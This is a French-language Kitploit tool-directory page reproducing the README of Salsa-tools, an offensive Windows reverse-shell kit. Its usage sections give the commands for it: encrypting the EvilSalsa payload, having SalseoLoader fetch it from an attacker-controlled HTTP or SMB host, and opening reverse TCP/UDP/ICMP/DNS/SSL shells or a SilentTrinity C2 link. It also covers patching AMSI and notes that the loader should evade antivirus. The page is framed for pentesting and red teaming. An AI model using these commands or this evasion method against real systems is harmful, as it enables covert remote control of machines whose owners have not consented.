Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Salsa-tools — Salsa Tools - ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP/Shellcode/SILENTTRINITY et contournement d'AV, AMSI patché | Kitploit
Outils/GitHubGitHub/hackplayers/salsa-tools
Escalade de PrivilègesOutils de Chiffrement/DéchiffrementExploitationÉvasion IDS/IPSMouvement LatéralShellcodePost-ExploitationCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles
GitHub
58713057il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
hackplayers/salsa-tools

Salsa-tools

Salsa Tools - ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP/Shellcode/SILENTTRINITY et contournement d'AV, AMSI patché

Voir le dépôt

License

   _____       __              ______            __    
  / ___/____ _/ /________ _   /_  __/___  ____  / /____
  \__ \/ __ `/ / ___/ __ `/    / / / __ \/ __ \/ / ___/
 ___/ / /_/ / (__  ) /_/ /    / / / /_/ / /_/ / (__  ) 
/____/\__,_/_/____/\__,_/    /_/  \____/\____/_/____/  

Salsa Tools - Un Reverse Shell anti-AV trempé dans la sauce bellota

Salsa Tools est un ensemble de trois outils différents qui, combinés, vous permettent d'obtenir un reverse shell surpuissant dans n'importe quel environnement Windows sans même avoir besoin de PowerShell pour son exécution. Afin d'éviter les dernières techniques de détection (AMSI), la plupart des composants ont été initialement écrits en C#. Salsa Tools a été publiquement publié par Luis Vacas lors de sa conférence « Inmersión en la explotación tiene rima » qui s'est déroulée lors de h-c0n le 9 février 2019.

Fonctionnalités

* TCP/UDP/ICMP/DNS/BIND/SSL/Shellcode/SilentTrinity     
* Sûr contre les AV (17 février)
* Correcteurs AMSI
* Exécution PowerShell 
* ...

Aperçu

Salsa-Tools est composé de trois ingrédients différents : - EvilSalsa - EncrypterAssembly - SalseoLoader Et son comportement est le suivant :

Configuration

Prérequis

  • Visual Studio 2017 (ou similaire)
    • Dépendances Microsoft.PowerShell.3.ReferenceAssemblies lors de la compilation en .NET 4.0
    • Dépendances Microsoft.PowerShell.2.ReferenceAssemblies lors de la compilation en .NET 3.5
  • Python 2.7

Exécuter la Salsa

Cuisiner EvilSalsa

   ___ __ __  ____  _            
  /  _]  |  ||    || |           
 /  [_|  |  | |  | | |           
|    _]  |  | |  | | |___        
|   [_|  :  | |  | |     |       
|     |\   /  |  | |     |       
|_____| \_/  |____||_____|       
                                 
  _____  ____  _     _____  ____ 
 / ___/ /    || |   / ___/ /    |
(   \_ |  o  || |  (   \_ |  o  |
 \__  ||     || |___\__  ||     |
 /  \ ||  _  ||     /  \ ||  _  |
 \    ||  |  ||     \    ||  |  |
  \___||__|__||_____|\___||__|__|
  
[+] C'est notre charge utile
                                 

EvilSalsa est l'ingrédient clé de cette recette. Il contient la charge utile, qui est exécutée sur le système comme suit : dès que la charge utile démarre, elle exécute System.Management.Automation.dll qui crée un runspace. Dans ce runspace, nous avons quatre types de shells (TCP / UDP / ICMP / DNS / BINDTCP / SHELLCODE / SILENTTRINITY). Une fois EvilSalsa chargé, première chose, l'existence de c:\windows\system32\amsi.dll est vérifiée. Si elle existe, elle est patchée à l'aide d'une variante maison des bypass de CyberArk et Rastamouse.

Mélanger EncrypterAssembly et Evilsalsa

  ______                             _            
 |  ____|                           | |           
 | |__   _ __   ___ _ __ _   _ _ __ | |_ ___ _ __ 
 |  __| | '_ \ / __| '__| | | | '_ \| __/ _ \ '__|
 | |____| | | | (__| |  | |_| | |_) | ||  __/ |   
 |______|_| |_|\___|_|   \__, | .__/ \__\___|_|   
     /\                   __/ | || |   | |        
    /  \   ___ ___  ___ _|___/|_|| |__ | |_   _   
   / /\ \ / __/ __|/ _ \ '_ ` _ \| '_ \| | | | |  
  / ____ \\__ \__ \  __/ | | | | | |_) | | |_| |  
 /_/    \_\___/___/\___|_| |_| |_|_.__/|_|\__, |  
                                           __/ |  
                                          |___/   
			  
 [+] Logiciel qui chiffre la charge utile en utilisant RC4
 [+] Nous avons la version en python et la version en .exe

EncrypterAssembly peut être utilisé comme un script Python ou comme un binaire Exe. Il chiffre le EvilSalsa précédemment généré.

Utilisation en Python :

python encrypterassembly.py <FILE> <PASSWORD> <OUTPUT>

Utilisation de l'exécutable :

Encrypterassembly.exe <FILE> <PASSWORD> <OUTPUT>

Apporter l'EvilSalsa chiffré sur la table avec SalseoLoader

SalseoLoader est chargé de charger la charge utile chiffrée. Il peut être compilé à la fois comme une bibliothèque ou comme un exécutable. S'il est exécuté en tant qu'exécutable, les arguments choisis doivent être fournis lors de l'exécution. S'il est compilé en tant que bibliothèque, le descripteur 'main' doit être exporté. Les arguments sont ajoutés à l'aide de variables d'environnement.

  _____  ____  _     _____   ___   ___
 / ___/ /    || |   / ___/  /  _] /   \
(   \_ |  o  || |  (   \_  /  [_ |     |
 \__  ||     || |___\__  ||    _]|  O  |
 /  \ ||  _  ||     /  \ ||   [_ |     |
 \    ||  |  ||     \    ||     ||     |
  \___||__|__||_____|\___||_____| \___/

 _       ___    ____  ___      ___  ____
| |     /   \  /    ||   \    /  _]|    \
| |    |     ||  o  ||    \  /  [_ |  D  )
| |___ |  O  ||     ||  D  ||    _]|    /
|     ||     ||  _  ||     ||   [_ |    \
|     ||     ||  |  ||     ||     ||  .  \
|_____| \___/ |__|__||_____||_____||__|\_|

                             By: CyberVaca@HackPlayers

[+] Utilisation :

    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT
    [-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT
    [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseICMP LHOST
    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS
    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT
    [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT
    [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode
    [-] SalseoLoader.exe password http://webserver.com/silent.txt silenttrinity URL_C2C

[+] Charges utiles disponibles :

    [-] ReverseTCP  [-] ReverseDNS   [-] ReverseSSL  [-] Shellcode
    [-] ReverseUDP  [-] ReverseICMP  [-] BindTCP     [-] SilentTrinity

Tutoriel

Compilation des binaires

Téléchargez le code source depuis GitHub et compilez EvilSalsa et SalseoLoader. Vous aurez besoin de Visual Studio installé pour compiler le code.

Compilez ces projets pour l'architecture de la machine Windows où vous allez les utiliser (si Windows supporte x64, compilez-les pour cette architecture).

Vous pouvez sélectionner l'architecture dans Visual Studio sous l'onglet 'Build' à gauche, dans 'Platform Target'.

(Si vous ne trouvez pas ces options, appuyez sur 'Project Tab' puis sur ' Properties')

Ensuite, compilez les deux projets (Build -> Build Solution) (Dans les logs, le chemin de l'exécutable apparaîtra) :

Préparer la backdoor

Tout d'abord, vous aurez besoin d'encoder la EvilSalsa.dll. Pour ce faire, vous pouvez utiliser le script Python encrypterassembly.py ou compiler le projet EncrypterAssembly

Python

python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsa.dll password evilsalsa.dll.txt

Windows

EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsa.dll password evilsalsa.dll.txt

Ok, maintenant vous avez tout ce dont vous avez besoin pour exécuter tout le truc Salseo : la EvilDalsa.dll encodée et le binaire de SalseoLoader. Téléchargez le binaire SalseoLoader.exe sur la machine. Il ne devrait pas être détecté par un antivirus...

Exécuter la backdoor

Obtenir un reverse shell TCP (téléchargement de la dll encodée via HTTP)

N'oubliez pas de démarrer un nc comme écouteur de reverse shell, et un serveur HTTP pour servir l'evilsalsa encodé.

SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>

Télécharger l’outil